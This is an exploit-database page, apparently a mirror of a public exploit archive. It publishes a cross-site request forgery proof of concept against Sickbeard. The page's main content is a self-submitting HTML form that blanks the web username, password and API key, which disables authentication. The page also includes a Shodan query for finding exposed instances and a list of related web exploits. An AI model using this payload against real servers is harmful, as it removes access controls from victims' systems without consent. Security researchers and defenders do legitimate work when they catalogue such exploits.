Search for hundreds of thousands of exploits

"Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)"

Author

Exploit author

bdrake

Platform

Exploit platform

multiple

Release date

Exploit published date

2020-07-26

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# Exploit Title: Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)
# Google Dork: https://www.shodan.io/search?query=sickbeard
# Date: 2020-06-06
# Exploit Author: bdrake
# Vendor Homepage: https://sickbeard.com/
# Software Link: https://github.com/midgetspy/Sick-Beard
# Version: alpha (master) -- git : 31ceaf1b5cab1884a280fe3f4609bdc3b1fb3121
# Tested on: Fedora 32
# CVE : NA

<html>
<body>
	<!-- 
		Clearing username and password disables authentication.
		Requires a server restart for changes to take effect.
	-->
	<form action="http://1ocalhost:8081/config/general/saveGeneral" method="POST">
		<input type="hidden" name="log_dir" value="Logs" />
	   	<input type="hidden" name="web_port" value="8081" />
   	    <input type="hidden" name="web_username" value="" />
		<input type="hidden" name="web_password" value="" />
		<input type="hidden" name="https_cert" value="server.crt" />
		<input type="hidden" name="https_key" value="server.key" />
		<input type="hidden" name="api_key" value="" />
    </form>
    <script>
		document.forms[0].submit();
    </script>
</body>
</html>
Release DateTitleTypePlatformAuthor
2020-09-18"SpamTitan 7.07 - Remote Code Execution (Authenticated)"webappsmultiple"Felipe Molina"
2020-09-11"Tea LaTex 1.0 - Remote Code Execution (Unauthenticated)"webappsmultiplenepska
2020-09-11"VTENEXT 19 CE - Remote Code Execution"webappsmultiple"Marco Ruela"
2020-09-07"Cabot 0.11.12 - Persistent Cross-Site Scripting"webappsmultiple"Abhiram V"
2020-08-28"Nagios Log Server 2.1.6 - Persistent Cross-Site Scripting"webappsmultiple"Jinson Varghese Behanan"
2020-08-27"Mida eFramework 2.9.0 - Remote Code Execution"webappsmultipleelbae
2020-08-26"Ericom Access Server x64 9.2.0 - Server-Side Request Forgery"webappsmultiplehyp3rlinx
2020-08-26"Eibiz i-Media Server Digital Signage 3.8.0 - Directory Traversal"webappsmultipleLiquidWorm
2020-07-26"Socket.io-file 2.0.31 - Arbitrary File Upload"webappsmultipleCr0wTom
2020-07-26"Bio Star 2.8.2 - Local File Inclusion"webappsmultiple"SITE Team"
Release DateTitleTypePlatformAuthor
2020-07-26"Sickbeard 0.1 - Cross-Site Request Forgery (Disable Authentication)"webappsmultiplebdrake
2020-07-07"Sickbeard 0.1 - Remote Command Injection"webappshardwarebdrake
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48712/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.